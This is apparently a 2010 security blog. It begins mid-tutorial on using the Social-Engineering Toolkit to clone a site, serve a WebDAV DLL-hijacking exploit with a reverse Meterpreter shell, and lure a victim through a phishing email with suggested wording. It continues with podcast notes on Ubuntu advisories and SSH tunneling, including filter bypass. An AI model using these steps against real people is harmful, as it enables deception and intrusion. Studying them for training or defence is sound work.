And yet again select option 2, “Site Cloner” this method will completely clone a website of your choosing and allow you to utilize the attack vectors within the same web application you were attempting to clone.

Choosing your browser Exploit:

At this point you have several options to choose from, today we will be picking option 1 “Microsoft Windows WebDAV Application DLL Hijacker”.

Choosing your Payload:

Once more you are giving several options, I choose option 2 “Windows Reverse_TCP Meterpreter“, this payload  will spawn a meterpreter shell on the victim and send it back to the attacker.

Once you are done, you have to choose your vulnerable extension types if you are not certain select enter to choose the defaults, or find a semi-complete list over at exploitdb . At this point the malicious iframes are infected into the cloned website and awaits your victim.

SET Mass E-Mailer Option :

There are two options on the mass e-mailer,we are choosing option1 this option will allow you to send an email to one individual person. Once you are done you have to choose who you would like to send the phishing email too, and who is your sender lastly figure if you would like to use Gmail, your own mail server or some open relay server.

Next think of something clever as a email subject and body. A good example would be to clone a local web-based system from your attacker network and send an email saying “we are doing some updates kindly click to verify you can access this test link. After you are finish click Ctrl + C and hit enter to complete this step. You will then receive a message stating that SET has already sent the email. Now is just a matter of waiting on your victim to click the email and check out the vulnerable files via the network share.

Exploit in action..

Once your victim clicks on the link, the  will be presented with the cloned site at first then the exploit will begin doing its thing in the background. Shortly after the user will be presented with a network share with the vulnerable files. After opening up the file  it  its Game Over.

Since the initial reporting of this issue, many researchers have came out with several ways of doing this so far some of my favorites are:

• Using msfconsole courtesy of the guys HDM in this post.
• Using msfpayload courtesy of Matt over at http://www.attackvector.org/alternative-dll-hijacking-method/
• Yet again Matt demoing using msfpayload + autorun usb stick  http://www.attackvector.org/autorun-dll-hijacker-usb-stick/

I have tested several of these and noticed that MSE AV was effective in identifying the msfpayload file, however using the standard method I successful exploited both windows XP and Windows 7.

Reference links:

http://www.exploit-db.com/exploits/14726/

http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

http://blog.rapid7.com/?p=5325

http://www.securityfocus.com/archive/1/513190

http://www.microsoft.com/technet/security/advisory/2269637.mspx

http://www.vimeo.com/14403642

http://www.secmaniac.com/

http://www.offensive-security.com/offsec/microsoft-dll-hijacking-exploit-in-action/

http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit

I appeared on the Linux Basix podcast a few weeks ago but since I was out of the country for a while I am now getting around to posting the show notes for my segment.

Information Security news in the world of Linux:

• PCSC-lite vulnerability –> http://seclists.org/fulldisclosure/2010/Aug/71

A security issue affects the following Ubuntu releases:
– Ubuntu 9.04
– Ubuntu 9.10
– Ubuntu 10.04 LTS

• Brief Details :

It was discovered that the PC/SC service did not correctly handle  malformed messages. A local attacker could exploit this to execute
arbitrary code with root privileges. In short update your system NOW!

Dell Latitude 2110 vulnerability –> https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-August/001135.html

A security issue affects the following Ubuntu releases:

• Ubuntu 9.10
  Ubuntu 10.04 LTS
• Brief Details:

It was discovered that the Ubuntu image shipped on some Dell Latitude 2110 systems was accidentally configured to allow unauthenticated package installations. A remote attacker intercepting network communications or a malicious archive mirror server could exploit this to trick the user into installing unsigned packages, resulting in arbitrary code execution with root privileges.
Segment Title: SSH tunneling for good or evil!

What is SSH –

Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices.

How to install/Setup SSH?

First be sure to install the most recent version as of yesterday OpenSSH version 5.6 is the most recent version.

sudo apt-get install ssh or configure from source

• Then do a quick test by trying to SSH into your own machine, SSH  localhost
• Then of course you can always edit the  /etc/ssh/sshd_config file and do things like force version 2, deny root login and sort.

What is tunneling?

Tunneling, also known as “port forwarding,” is the transmission of data intended for use only within a private, usually corporate network through a public network in such a way that the routing nodes in the public network are unaware that the transmission is part of a private network

Various types of tunneling protocols:

• HTTP
• ICMP
• DNS
• SSH

SSH tunneling how it works: Nice Youtube video to get you started –> http://www.youtube.com/watch?v=EUplDL4hSuc

When can you use this?

• For good –> You can use this to create a Sock5 proxy to securely tunnel your web traffic for instance if you are at a free Wi-Fi hot spot.

• Or if you want to bypass some content filtering that’s in place to block you from accessing certain websites
• Securely tunnel your IM chat or Email which you know by default are both clear text protocol

Examples:

Tunneling Gtalk traffic –>  ssh -f  user@myhomeserver.com -L 3000:talk.google.com:5222 home -N

Tunneling Email –>  ssh -f user@myhomeserver.com -L 2000:personal-server.com:25 -N

• For evil –> http://infolookup.securegossip.com/2010/05/13/keeping-an-eye-on-your-vendors/, “reverse SSH tunneling “as you would expect if tunneling is getting pass a firewall  in a forward direction, reverse tunneling is getting access to the inside host by going out and coming back in. I linked to a posting I did back in May about an incident I had to track down and re-mediate.
  • In short  A vendor  of ours had a Linux based  appliance on the inside of our network in which the had a pre-configured  “stealthy reverse tunnel” that would give them access to that system at anytime without our assistance.

Reference Links

<https://secure.wikimedia.org/wikipedia/en/wiki/Secure_Shell>

https://calomel.org/firefox_ssh_proxy.html

https://help.ubuntu.com/community/SSH/OpenSSH/Configuring
http://www.howtogeek.com/howto/ubuntu/setup-openssh-server-on-ubuntu-linux/

http://searchenterprisewan.techtarget.com/sDefinition/0,,sid200_gci213230,00.html